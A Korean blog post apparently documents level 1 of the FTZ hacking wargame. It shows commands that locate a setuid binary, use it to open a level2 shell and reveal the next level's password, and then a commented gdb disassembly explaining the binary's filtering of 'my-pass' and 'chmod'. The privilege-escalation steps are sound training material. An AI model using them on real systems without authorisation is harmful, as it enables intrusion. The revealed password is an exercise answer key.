FTZ_Level_1

2020. 3. 9. 20:14FTZ

[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null 
/bin/ExecuteMe 

 

[level1@ftz level1]$ /bin/ExecuteMe
                레벨2의 권한으로 당신이 원하는 명령어를 
                한가지 실행시켜 드리겠습니다. 
                (단, my-pass 와 chmod는 제외) 

                어떤 명령을 실행시키겠습니까? 


                [level2@ftz level2]$ bash

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

[level1@ftz level1]$ gdb /bin/ExecuteMe

(gdb) disassemble main

Dump of assembler code for function main:

0x08048488 <main+0>: push %ebp /* main 함수로 진입하기 전에 EBP(메모리 구조)

주소를 스택에 저장 */

0x08048489 <main+1>: mov %esp,%ebp /* 현재의 스택 포인터(ESP)를 스택의 베이스 포인

(EBP)에 저장 */

0x0804848b <main+3>: sub $0x28,%esp /* main() 함수에서 사용할 변수의 공간

0x0804848e <main+6>: and $0xfffffff0,%esp 을 확보 */

0x08048491 <main+9>: mov $0x0,%eax

0x08048496 <main+14>: sub %eax,%esp

0x08048498 <main+16>: sub $0xc,%esp

0x0804849b <main+19>: push $0x8048680

0x080484a0 <main+24>: call 0x8048358 <system> /* int system(const char *string); */

0x080484a5 <main+29>: add $0x10,%esp

0x080484a8 <main+32>: sub $0xc,%esp

0x080484ab <main+35>: push $0x804868f

0x080484b0 <main+40>: call 0x8048378 <chdir> /* int chdir(const char *path); */

0x080484b5 <main+45>: add $0x10,%esp

0x080484b8 <main+48>: sub $0xc,%esp

0x080484bb <main+51>: push $0x80486a0

0x080484c0 <main+56>: call 0x80483a8 <printf> /* int printf(const char *format,

...); */

0x080484c5 <main+61>: add $0x10,%esp

0x080484c8 <main+64>: sub $0xc,%esp

0x080484cb <main+67>: push $0x80486e0

0x080484d0 <main+72>: call 0x80483a8 <printf>

0x080484d5 <main+77>: add $0x10,%esp

0x080484d8 <main+80>: sub $0xc,%esp

0x080484db <main+83>: push $0x8048720

0x080484e0 <main+88>: call 0x80483a8 <printf>

0x080484e5 <main+93>: add $0x10,%esp

0x080484e8 <main+96>: sub $0xc,%esp

0x080484eb <main+99>: push $0x8048760

0x080484f0 <main+104>: call 0x80483a8 <printf>

---Type <return> to continue, or q <return> to quit---

0x080484f5 <main+109>: add $0x10,%esp

0x080484f8 <main+112>: sub $0xc,%esp

0x080484fb <main+115>: push $0x8048782

0x08048500 <main+120>: call 0x80483a8 <printf>

0x08048505 <main+125>: add $0x10,%esp

0x08048508 <main+128>: sub $0x4,%esp

0x0804850b <main+131>: pushl $0x8049948

0x08048511 <main+137>: push $0x1e /* 0x1e = (10진수) 16 + 14 = 30 */

0x08048513 <main+139>: lea 0xffffffd8(%ebp),%eax

0x08048516 <main+142>: push %eax

0x08048517 <main+143>: call 0x8048368 <fgets> /* char *fgets(char *s, int size,

FILE *stream); */

0x0804851c <main+148>: add $0x10,%esp

0x0804851f <main+151>: lea 0xffffffd8(%ebp),%eax

0x08048522 <main+154>: sub $0x8,%esp

0x08048525 <main+157>: push $0x804879c

0x0804852a <main+162>: push %eax

0x0804852b <main+163>: call 0x8048388 <strstr> /* char *strstr(const char *haystack,

const char *needle); */

0x08048530 <main+168>: add $0x10,%esp

0x08048533 <main+171>: test %eax,%eax

0x08048535 <main+173>: je 0x8048551 <main+201>

0x08048537 <main+175>: sub $0xc,%esp

0x0804853a <main+178>: push $0x80487c0

0x0804853f <main+183>: call 0x80483a8 <printf>

0x08048544 <main+188>: add $0x10,%esp

0x08048547 <main+191>: sub $0xc,%esp

0x0804854a <main+194>: push $0x0

0x0804854c <main+196>: call 0x80483c8 <exit>

0x08048551 <main+201>: lea 0xffffffd8(%ebp),%eax

0x08048554 <main+204>: sub $0x8,%esp

0x08048557 <main+207>: push $0x80487e8

---Type <return> to continue, or q <return> to quit---

0x0804855c <main+212>: push %eax

0x0804855d <main+213>: call 0x8048388 <strstr> /* if 찾는문자열이 존재하면

%eax는 찾은 부분 pointer

else %eax0 */

0x08048562 <main+218>: add $0x10,%esp

0x08048565 <main+221>: test %eax,%eax /* AND 연산 후 0이면 ZF=1 */

0x08048567 <main+223>: je 0x8048583 <main+251> /* if ZF=1 jump 0x8048583 */

0x08048569 <main+225>: sub $0xc,%esp /* if ZF=0 여기 실행 */

0x0804856c <main+228>: push $0x8048800

0x08048571 <main+233>: call 0x80483a8 <printf>

0x08048576 <main+238>: add $0x10,%esp

0x08048579 <main+241>: sub $0xc,%esp

0x0804857c <main+244>: push $0x0

0x0804857e <main+246>: call 0x80483c8 <exit>

0x08048583 <main+251>: sub $0xc,%esp

0x08048586 <main+254>: push $0x8048826

0x0804858b <main+259>: call 0x80483a8 <printf>

0x08048590 <main+264>: add $0x10,%esp

0x08048593 <main+267>: sub $0x8,%esp

0x08048596 <main+270>: push $0xbba /* 0xbba = (10진수) 3002 */

0x0804859b <main+275>: push $0xbba /* 0xbba = (10진수) 3002 */

0x080485a0 <main+280>: call 0x80483b8 <setreuid> /* int setreuid(uid_t ruid, uid_t

euid); */

0x080485a5 <main+285>: add $0x10,%esp

0x080485a8 <main+288>: sub $0xc,%esp

0x080485ab <main+291>: lea 0xffffffd8(%ebp),%eax

0x080485ae <main+294>: push %eax

0x080485af <main+295>: call 0x8048358 <system>

0x080485b4 <main+300>: add $0x10,%esp

0x080485b7 <main+303>: leave

0x080485b8 <main+304>: ret

0x080485b9 <main+305>: nop

0x080485ba <main+306>: nop

---Type <return> to continue, or q <return> to quit---

0x080485bb <main+307>: nop

End of assembler dump.

(gdb) x/s 0x8048680

0x8048680 <_IO_stdin_used+28>: "/usr/bin/clear"

(gdb) x/s 0x804868f

0x804868f <_IO_stdin_used+43>: "/home/level2"

(gdb) x/s 0x80486e0

0x80486e0 <_IO_stdin_used+124>: "\t\t한가지 실행시켜 드리겠습니다.\n"

(gdb) x/s 0x8048720

0x8048720 <_IO_stdin_used+188>: "\t\t(, my-pass chmod는 제외)\n"

(gdb) x/s 0x8048760

0x8048760 <_IO_stdin_used+252>: "\n\t\t어떤 명령을 실행시키겠습니까?\n"

(gdb) x/s 0x8048782

0x8048782 <_IO_stdin_used+286>: "\n\n\t\t[level2@ftz level2]$ "

(gdb) x/s 0x8049948

0x8049948 <stdin@@GLIBC_2.0>: ""

(gdb) x/s 0x804879c

0x804879c <_IO_stdin_used+312>: "my-pass"

(gdb) x/s 0x80487c0

0x80487c0 <_IO_stdin_used+348>: "\n\t\tmy-pass 명령은 사용할 수 없습니다.\n\n"

(gdb) x/s 0x80487e8

0x80487e8 <_IO_stdin_used+388>: "chmod"

(gdb) x/s 0x8048800

0x8048800 <_IO_stdin_used+412>: "\n\t\tchmod 명령은 사용할 수 없습니다.\n\n"

(gdb) x/s 0x8048826

0x8048826 <_IO_stdin_used+450>: "\n\n"

(gdb) quit

 

'FTZ' 카테고리의 다른 글

FTZ_Level_2  (0) 2020.03.10

관련글

티스토리툴바